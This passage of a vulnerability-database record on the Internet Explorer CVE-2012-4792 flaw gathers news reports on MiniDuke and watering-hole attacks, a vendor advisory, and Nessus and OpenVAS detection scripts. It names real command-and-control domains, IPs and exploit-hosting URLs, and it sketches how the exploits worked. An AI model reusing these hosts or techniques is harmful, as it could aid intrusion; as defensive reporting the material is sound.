It can be used for espionage as well as some variants have the capability to start remote command shells, take screenshots, start audio or video recordings and drop keylogging software.\n", "modified": "2013-07-02T19:25:28", "published": "2013-05-06T11:14:47", "id": "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "href": "https://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/100212/", "type": "threatpost", "title": "IE 8 Zero Day Widens Scope of DoL Watering Hole Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:09", "bulletinFamily": "info", "description": "Researchers at Kaspersky Lab and CrySys Lab have discovered files buried inside a MiniDuke command and control server that indicate the presence of a Web-based facet of the campaign that initially targeted government agencies, primarily in Europe.\n\nUsers are likely lured to the malicious webpages via spear phishing messages containing a link to the attack site. The site, which remains active, is serving exploits for patched vulnerabilities in Java and Internet Explorer, researcher Igor Soumenkov wrote on the [Securelist](<http://www.securelist.com/en/blog/208194159/Miniduke_web_based_infection_vector>) blog today.\n\nSoumenkov said the attack site hosts a pair of frames, one that loads a webpage from a legitimate organization involved in the rebuilding and modernization of Iraq. In addition to the decoy page, a malicious page acts as a \u201cprimitive exploit pack,\u201d Soumenkov said, determining the browser used to visit the attack site and then serves the appropriate exploit. Data collected is also sent to the attacker\u2019s server.[](<https://threatpost.com/new-web-based-miniduke-components-discovered-031113/>)\n\n\u201cThe exploits are located in separate webpages,\u201d Soumenkov wrote. 
\u201cClients using Internet Explorer version 8 are served with about.htm, for other versions of the browser and for any other browser capable of running Java applets, the javascript code loads JavaApplet.html.\u201d\n\nThe Java file loads a Java class file that exploits [CVE-2013-0422](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>), a vulnerability affecting Java 7u10 and older that bypasses the built-in sandbox in Java to allow remote code execution. Soumenkov said the exploit is coded slightly differently than others exploiting this vulnerability, including the Metasploit module, likely to avoid detection by security software. Oracle patched this vulnerability on Jan. 13; the applet was uploaded on Feb. 11, Soumenkov said.\n\nOnce the Java shellcode is executed, it launches an encrypted DLL and writes it to a temporary Java directory with the name ntuser.bin. It then copies the rundll.32.exe system file to the same directory along with another executable that loads the main module of Miniduke.\n\nMiniduke then reaches out to a pre-seeded Twitter post hosting a URL connecting it to the command and control server to download further instructions.\n\nThe IE 8 exploit behaves similarly, but exploits [CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>), which was [patched in December by Microsoft](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>). A Metasploit module was released Dec. 29 and the [Microsoft Security Update MS13-008](<http://technet.microsoft.com/en-us/security/bulletin/ms13-008>) on Jan. 14. Like its Java counterpart, this exploit page was uploaded Feb. 
11.\n\nThe shellcode used in the IE attack downloads a GIF image from the command and control server, then decrypts the portable executable file hidden in the image.\n\n\u201cThe PE file also appeared to be a modification of the Miniduke\u2019s main backdoor module that uses the same Twitter URL as the Java payload,\u201d Soumenkov wrote.\n\nMiniDuke surfaced on Feb. 27 and was originally thought to be just a phishing campaign where targets were emailed malicious PDF files pretending to be Ukraine\u2019s foreign policy and NATO membership plans, as well as information for a phony human rights seminar. The PDF attacks targeted CVE-2013-0640, an Adobe Reader vulnerability that had been patched a week earlier. Attackers were able to copy and move files, create new directories, kill processes and install additional malware. MiniDuke was the second successful Reader sandbox bypass.\n\nMiniDuke stood out for researchers for its use of steganography to hide custom backdoor code, as well as using Twitter to reach URLs pointing to command and control servers. Another unique feature of MiniDuke was its use of a small downloader written in an old-school Assembler language used to gather system information unique to the compromised machine.\n\n\u201cThis is a unique and very strange attack. The many different targets hit in separate countries, together with the high profile appearance of the decoy documents and the weird backdoor functionality indicate an unusual threat actor,\u201d said the original Kaspersky and CrySyS report. 
\u201cSome of the elements remind us of both Duqu and Red October, such as the minimalistic approach, hacked servers, encrypted channels but also the typology of the victims.\u201d\n", "modified": "2013-05-08T14:19:31", "published": "2013-03-11T16:29:10", "id": "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "href": "https://threatpost.com/new-web-based-miniduke-components-discovered-031113/77610/", "type": "threatpost", "title": "New Web-Based MiniDuke Components Discovered", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:31", "bulletinFamily": "info", "description": "[](<https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/>)The [Java saga](<https://threatpost.com/its-time-abandon-java-012113/>) continued when unknown, and apparently well concealed goons exploited recent Java and Internet Explorer zero-days to compromise the website of the French-based, free-press advocacy group, Reporters Without Borders. The attack, which attempted to take advantage of the time-gulf that separates Oracle\u2019s patch release from their users\u2019 application of it, is part of a [watering hole campaign](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) also targeting [Tibetan](<https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/>) and Uygur human rights groups as well as Hong Kong and Taiwanese political parties and other non-governmental organizations.\n\n[Writing on the Avast Security blog](<https://blog.avast.com/2013/01/22/reporters-without-borders-website-misused-in-wateringhole-attack/>), Jindrich Kubec claims it is safe to assume that China is behind these attacks. 
Kubec\u2019s assertion appears to be based, at least in part, on the reality that visitors to the [watering hole](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>) sites (and the sites themselves for that matter), are, for lack of a better way to put it, individuals, organizations, and political entities that the People\u2019s Republic publicly does not like.\n\nThe watering hole attack is a social engineering technique whereby attackers attempt to compromise websites that are not directly or officially related to their intended targets but which they believe members of an intended target organization are likely to visit.\n\nAccording to the Avast report, the attackers used the recent Internet Explorer and Java vulnerabilities, identified as CVE-2012-4792 and CVE-2013-0422 respectively. Microsoft resolved the IE bug with [MS13-008](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>) and Oracle fixed theirs with [Java 7 update 11](<https://threatpost.com/newest-java-7-update-still-exploitable-researcher-says-090412/>).\n\nIn the end, if the exploits succeed they will infect victim machines with either a [remote access trojan](<https://threatpost.com/fakem-rat-mimics-normal-network-traffic-011813/>) that phones home to the Singapore-based \u201cluckmevnc.myvnc.com\u201d (IP address 112.140.186.252) or an injector that flashes a fake error page while downloading a similar remote access tool that communicates with the Hong Kong-based \u201cd.wt.ikwb.com\u201d (58.64.179.139).\n\nAn English version of the Reporters Without Borders site contained a suspicious javascript inclusion. That inclusion creates a cookie called \u201csomethingbbbbb\u201d designed to expire after one day. 
The same cookie was used in similar attacks a few years ago and Kubec believes it could be related to the legitimate m.js cookie, \u201csomethingeeee,\u201d used by a Hong Kong political party.\n\nKubec also determined that an iframe from hxxp://newsite.acmetoy.com/m/d/pdf.html targeted users visiting the site in IE 8. There were an additional two iframes, hxxp://newsite.acmetoy.com/m/d/pdf.html and hxxp://newsite.acmetoy.com/m/d/javapdf.html reserved for those that visited the site on a browser other than IE.\n\nAccording to Kubec\u2019s analysis of newsite.acmetoy.com, the site hosted a number of files relating to the IE exploit listed above, including a DOITYOUR obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability as well as DOITYOUR variants of \u201ctoday.swf,\u201d \u201cnews.html,\u201d and \u201crobots.txt.\u201d\n\nThe site also attempted to exploit at least one other Java vulnerability from back in 2011 as well (CVE-2011-3544) and contained the related files, \u201cjavapdf.html,\u201d a javascript file for both vulnerabilities, \u201cAppletHigh.jar,\u201d a CVE-2013-0422 exploit, and \u201cAppletLow.jar,\u201d a CVE-2011-3544 exploit.\n\nIn an analysis of another site (98.129.194.210), Kubec found that it contained the same malicious Java-related content and reasons that it probably serves as a backup to the first in the event of a takedown.\n\nAvast said it notified Reporters Without Borders.\n", "modified": "2013-05-13T18:47:05", "published": "2013-01-23T18:53:02", "id": "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "href": "https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/77443/", "type": "threatpost", "title": "Attackers Exploit Java, Compromise Reporters Without Borders Site", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:38", "bulletinFamily": "info", "description": "Expect amped up pressure 
aimed in Microsoft\u2019s direction for a patch for the Internet Explorer zero day that surfaced last week, now that researchers at Exodus Intelligence reported today they have developed a bypass for the Fix It that Microsoft released as a temporary mitigation.\n\nTheir new exploit beat a fully patched Windows system running IE 8, the same version of the browser exploited by malware used in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) against a number of political and manufacturing websites, including the Council on Foreign Relations in the U.S., and Chinese human rights site Uygur Haber Ajanski.\n\nIE 6 and 7 also hold the same [use-after free memory vulnerability (CVE-2012-4792)](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) but are currently not being exploited. Microsoft said the impact of the attacks is limited; IE 9 and 10 are not vulnerable, Microsoft said. Yesterday\u2019s [Patch Tuesday advisory](<https://threatpost.com/patch-ie-zero-day-wont-be-among-microsoft-security-updates-next-week-010313/>) previewing next Tuesday\u2019s batch of security updates did not include an IE patch.[](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>)\n\nBrandon Edwards, VP of Intelligence at Exodus, said his firm\u2019s researchers looked at the Fix It to determine how much of the vulnerability it prevented. \u201cUsually, there are multiple paths one can take to trigger or exploit a vulnerability,\u201d Edwards said. 
\u201cThe Fix It did not prevent all those paths.\u201d\n\nThe Fix It, according to Microsoft, is an [appcompat shim](<http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx>) that modifies in memory a particular function to always return NULL, resulting in a safe crash of the browser rather than allowing for remote code execution.\n\n\u201cIt comes down to clearly understanding the root cause and ways the browser can get to the affected code,\u201d Edwards said. \u201cThe Fix It covered paths used by the exploit, but not all the ways the vulnerability can be reached. A full patch should eliminate all those possibilities.\u201d\n\nIn the meantime, a handful of political, social and human rights sites in the U.S., Russia, China and Hong Kong have been infected and serving malware, for weeks in some cases, that exploits the IE zero day; as of yesterday, the [Uygur website was still serving an exploit](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>), researcher and Metasploit contributor Eric Romang said.\n\nMicrosoft has been informed of the Exodus Intelligence exploit; researchers at Exodus said they will not disclose details of their exploit until Microsoft addresses the vulnerability.\n\nEarlier this week, Exodus developed what it called a more [advanced exploit of the IE vulnerability](<http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/>), which led them to look more closely at the Fix It. Unlike the original remote code injection exploit, this one does not require a heap spray to execute it. Peter Vreugdenhil said they were able to take advantage of IE8\u2019s support for HTML+TIME, which is no longer supported in more current versions of the browser. 
The researchers were able to create an array with pointers to strings they controlled, he said, enabling them to control system calls without a heap spray.\n\n\u201cI used some new and/or non-public techniques to get a reliable exploit that doesn\u2019t require heap spray, but all in all this bug can be exploited quite reliably,\u201d Vreugdenhil said in a blogpost.\n\nSymantec, meanwhile, yesterday attributed the attacks to the [Elderwood Project](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>), which has been responsible for a number of Microsoft zero days in 2012, including an attack in May against Amnesty International\u2019s Hong Kong site targeting [CVE-2012-1875](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1875>), and several defense-related sites discovered in September to be hosting malware targeting [CVE-2012-4969](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>). [Symantec then tied the latest IE zero-day to the group](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>) after concluding that the Council on Foreign Relations and Capstone Turbine Corp. websites were hosting the same malicious Shockwave file.\n\n\u201cAll the samples we identified include a function named HeapSpary. HeapSpary is a clear mistyping of Heap Spray, a common attack step used in vulnerability exploitation,\u201d Symantec wrote in a [blogpost](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). \u201cIn addition to this commonality, there are many other symbols in common between the files.\u201d\n\nWatering hole attacks are carried out to monitor the victim\u2019s online activities. Attackers inject malicious files onto websites hoping to snare people with an interest in the site\u2019s focus. These types of attacks are not only effective, but are more economical than targeted attacks that start with a phishing email. 
Watering hole attacks require less advance legwork, yet are generally state-sponsored, intelligence-driven attacks.\n\nThe compromise of the CFR website, a foreign-policy resource for its notable public figure members and directors, brought the latest zero-day to light. The attack began as early as Dec. 7 and was still going on through the Christmas holiday. Attackers used a malicious Adobe Flash file called today.swf to launch a heap spray attack against IE, overrunning memory and enabling an attacker to remotely execute code on an infected computer. The Javascript hosting the exploit checks first to see if the Windows language is set to English, Chinese, Japanese, Korean or Russian before executing. It also uses cookies to ensure the attack is delivered only once.\n\nThe vulnerability, Microsoft said, occurs in the way IE accesses an object in memory that has been deleted or not properly allocated. Memory may be corrupted and allow an attacker to execute code with the user\u2019s privileges.\n\nResearchers at Avast Software yesterday reported infections on multiple sites worldwide. Researcher Jindrich Kubec said two of the sites were also hosting the binaries and configurations found in the September attacks Symantec tied to Elderwood. Those attacks were serving the PlugX and Poison Ivy RATs.\n", "modified": "2013-05-10T15:44:38", "published": "2013-01-04T18:34:39", "id": "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "href": "https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/77368/", "type": "threatpost", "title": "Researchers Bypass Microsoft Fix It for IE Zero Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-13T06:16:35", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. 
Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft Internet Explorer versions 6, 7, and 8 are affected.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nVendor fixes are available. 
Please see the references for more information.\n", "modified": "2012-12-30T00:00:00", "published": "2012-12-30T00:00:00", "id": "SMNTC-57070", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/57070", "type": "symantec", "title": "Microsoft Internet Explorer 'CDwnBindInfo' Use-After-Free Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-03T12:15:39", "bulletinFamily": "scanner", "description": "The remote host is missing the workaround referenced in KB 2794220\n(Microsoft ", "modified": "2019-11-02T00:00:00", "id": "SMB_KB2794220.NASL", "href": "https://www.tenable.com/plugins/nessus/63372", "published": "2013-01-02T00:00:00", "title": "MS KB2794220: Vulnerability in Internet Explorer Could Allow Remote Code Execution (deprecated)", "type": "nessus", "sourceData": "#@DEPRECATED\n#\n# Disabled on 2013/01/14. Deprecated by smb_nt_ms13-008.nasl\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63372);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSKB\", value:\"2794220\");\n\n script_name(english:\"MS KB2794220: Vulnerability in Internet Explorer Could Allow Remote Code Execution (deprecated)\");\n script_summary(english:\"Checks if 'Fix it' 50971 is in use.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has a web browser installed that is affected by a\nremote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing the workaround referenced in KB 2794220\n(Microsoft 'Fix it' 50971). 
This workaround mitigates a use-after-free\nvulnerability in Internet Explorer. Without this workaround enabled, an\nattacker could exploit this vulnerability by tricking a user into\nviewing a maliciously crafted web page, resulting in arbitrary code\nexecution. This vulnerability is being actively exploited in the wild.\n\nNote that the Microsoft 'Fix it' solution is effective only if the latest\navailable version of 'mshtml.dll' is installed. \n\nThis plugin has been deprecated due to the publication of MS13-008. \nMicrosoft has released updates that make the workarounds unnecessary. \nTo check for those, use Nessus plugin ID 63522.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2794220\");\n script_set_attribute(attribute:\"solution\", value:\"Apply Microsoft 'Fix it' 50971.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:microsoft:ie\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/ProductName\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Use smb_nt_ms13-008.nasl (plugin ID 63522) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/WindowsVersion');\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1)\n audit(AUDIT_WIN_SERVER_CORE);\n\nie_ver = hotfix_check_ie_version();\nif (ie_ver !~ \"^[678]\\.\") audit(AUDIT_INST_VER_NOT_VULN, 'IE', ie_ver);\n\nport = kb_smb_transport();\nvuln = 0;\n\nregistry_init();\nhandle = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nif(!systemroot) audit(AUDIT_FN_FAIL, 'hotfix_get_systemroot');\n\nguid = '{a1447a51-d8b1-4e93-bb19-82bd20da6fd2}';\npath = get_registry_value(handle:handle, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\n\nif (isnull(path))\n path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\nRegCloseKey(handle:handle);\nclose_registry(close:FALSE);\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n vuln = FALSE;\nelse\n vuln = TRUE;\n\nhotfix_check_fversion_end();\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus determined the Microsoft \\'Fix it\\' solution is not in use because' +\n '\\nthe following file was 
not found :\\n\\n' +\n path + '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:07", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.", "modified": "2019-05-21T00:00:00", "published": "2013-01-02T00:00:00", "id": "OPENVAS:1361412562310902699", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902699", "title": "Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902699\");\n script_version(\"2019-05-21T06:50:08+0000\");\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 06:50:08 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-01-02 10:52:56 +0530 (Wed, 02 Jan 2013)\");\n script_name(\"Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51695\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1027930\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/154201\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/80885\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2794220\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/advisory/2794220\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-au/security/bulletin/ms13-008\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could will remote attackers to gain sensitive\n information or execute arbitrary code in the context of the current 
user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x\");\n\n script_tag(name:\"insight\", value:\"Flaw exists due to the way that Internet Explorer accesses an object that has\n been deleted or has not been properly allocated and causing use-after-free error when handling the CDwnBindInfo object.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || ieVer !~ \"^[6-8]\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6325\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5098\") ||\n 
version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18746\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22994\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17184\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21392\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18020\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22184\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:11:25", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.", "modified": "2017-05-10T00:00:00", "published": "2013-01-02T00:00:00", "href": 
"http://plugins.openvas.org/nasl.php?oid=902699", "id": "OPENVAS:902699", "title": "Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms_ie_remote_code_exec_vuln.nasl 6093 2017-05-10 09:03:18Z teissa $\n#\n# Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could will remote attackers to gain sensitive\n information or execute arbitrary code in the context of the current user.\n Impact Level: System/Application\";\n\ntag_affected = \"Microsoft Internet Explorer version 6.x/7.x/8.x\";\ntag_insight = \"Flaw exists due to the way that Internet Explorer accesses an object that has\n been deleted or has not been properly allocated and causing use-after-free\n error when handling the CDwnBindInfo object.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n 
